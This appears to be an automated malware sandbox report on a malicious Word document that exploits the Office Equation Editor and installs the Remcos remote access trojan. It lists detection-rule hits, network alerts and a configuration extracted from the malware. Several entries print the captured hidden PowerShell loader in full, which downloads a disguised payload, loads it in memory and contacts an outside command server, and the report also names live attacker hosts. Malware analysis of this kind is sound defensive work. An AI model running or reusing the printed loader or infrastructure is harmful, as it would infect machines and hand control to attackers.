C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ?
                    Sigma detected: Usage Of Web Request Commands And Cmdlets
                    Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CHMR/05/481.142.932.58//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CHMR/05/481.142.932.58//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ?
                    Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\fastgeecleancheckupnewthinkstobege.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\fastgeecleancheckupnewthinkstobege.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3680, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\fastgeecleancheckupnewthinkstobege.vbs" , ProcessId: 3744, ProcessName: wscript.exe
                    Sigma detected: Modification of IE Registry Settings
                    Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3320, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?EU? ? ? ? ?T
                    Sigma detected: Office Macro File Creation
                    Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3320, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                    Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3796, TargetFilename: C:\Users\user\AppData\Local\Temp\lrqaccqg.vzv.ps1

                    Data Obfuscation

                    barindex
                    Sigma detected: Powershell download and load assembly
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CHMR/05/481.142.932.58//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CHMR/05/481.142.932.58//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ?

                    Stealing of Sensitive Information

                    barindex
                    Sigma detected: Remcos
                    Source: Registry Key setAuthor: Joe Security: Data: Details: 94 80 15 51 D0 65 B6 50 41 75 AB 59 6C D0 B6 DE 5B 82 DC 51 EE D7 CB 4A C6 C2 EC 20 E6 D7 68 F7 DD FB FD 48 BF 92 F0 14 1B 58 2E A1 0B D2 4F C2 CF A7 15 23 D4 B7 0D 25 B5 C3 3E 79 8A 86 82 DC EF E1 D0 57 EB FE 59 19 27 C2 5E A2 22 17 BB D1 ED 85 E0 15 F9 96 05 41 4A 6A 1B C3 A6 8F 2C 65 0E 4F 9C 6E DF F9 12 17 4C C0 2B 26 30 EC 9D 4B FF 38 , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 3988, TargetObject: HKEY_CURRENT_USER\Software\Rmc-OT0ZCG\exepath

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-09-09T17:34:42.017603+020020204231Exploit Kit Activity Detected85.239.241.18480192.168.2.2249171TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-09-09T17:34:42.017603+020020204251Exploit Kit Activity Detected85.239.241.18480192.168.2.2249171TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-09-09T17:34:43.502450+020020365941Malware Command and Control Activity Detected192.168.2.224917245.89.247.652201TCP
                    2024-09-09T17:34:45.019371+020020365941Malware Command and Control Activity Detected192.168.2.224917345.89.247.652201TCP
                    2024-09-09T17:35:19.102190+020020365941Malware Command and Control Activity Detected192.168.2.224917545.89.247.652201TCP
                    2024-09-09T17:35:19.260059+020020365941Malware Command and Control Activity Detected192.168.2.224917645.89.247.652201TCP
                    2024-09-09T17:35:23.687948+020020365941Malware Command and Control Activity Detected192.168.2.224917745.89.247.652201TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-09-09T17:34:41.212366+020020490381A Network Trojan was detected207.241.227.96443192.168.2.2249170TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-09-09T17:34:44.930337+020028033043Unknown Traffic192.168.2.2249174178.237.33.5080TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: xrrwwstCMd.docxAvira: detected
                    Antivirus detection for URL or domain
                    Source: dremom2.duckdns.orgAvira URL Cloud: Label: malware
                    Antivirus detection for dropped file
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\seethegeecakeisreallynicecakewhicgivingtasteoftherealgeeitscreatingniceforeverygeecakeloverswholoverthgeewhichnewonegetme__________nicecakeeateswellwithgee[1].docAvira: detection malicious, Label: HEUR/Rtf.Malformed
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B0E0C498.docAvira: detection malicious, Label: HEUR/Rtf.Malformed
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{BA66A863-2736-4CD9-8A42-3773360ED211}.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
                    Found malware configuration
                    Source: 0000000C.00000002.911284833.00000000006F1000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "dremom2.duckdns.org:2201:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-OT0ZCG", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                    Multi AV Scanner detection for submitted file
                    Source: xrrwwstCMd.docxReversingLabs: Detection: 13%
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.powershell.exe.41ceb20.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.powershell.exe.41ceb20.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000C.00000002.911284833.00000000006D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.911284833.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.394834348.0000000003EA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3884, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3988, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,12_2_004338C8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00404423 FreeLibrary,CryptUnprotectData,13_2_00404423
                    Source: powershell.exe, 0000000B.00000002.394834348.0000000003EA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_125e8abe-7

                    Exploits

                    barindex
                    Yara detected UAC Bypass using CMSTP
                    Source: Yara matchFile source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.powershell.exe.41ceb20.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.powershell.exe.41ceb20.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.394834348.0000000003EA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3884, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3988, type: MEMORYSTR
                    Office equation editor establishes network connection
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 85.239.241.184 Port: 80Jump to behavior
                    Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exeJump to behavior
                    Source: ~WRF{BA66A863-2736-4CD9-8A42-3773360ED211}.tmp.0.drStream path '_1787386826/\x1CompObj' : ...................F....Microsoft Equation 3.0....
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

                    Privilege Escalation

                    barindex
                    Contains functionality to bypass UAC (CMSTPLUA)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00407538 _wcslen,CoGetObject,12_2_00407538
                    Source: unknownHTTPS traffic detected: 95.217.202.210:443 -> 192.168.2.22:49163 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 95.217.202.210:443 -> 192.168.2.22:49165 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 207.241.227.96:443 -> 192.168.2.22:49170 version: TLS 1.0
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                    Source: unknownHTTPS traffic detected: 95.217.202.210:443 -> 192.168.2.22:49166 version: TLS 1.2
                    Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb\ source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
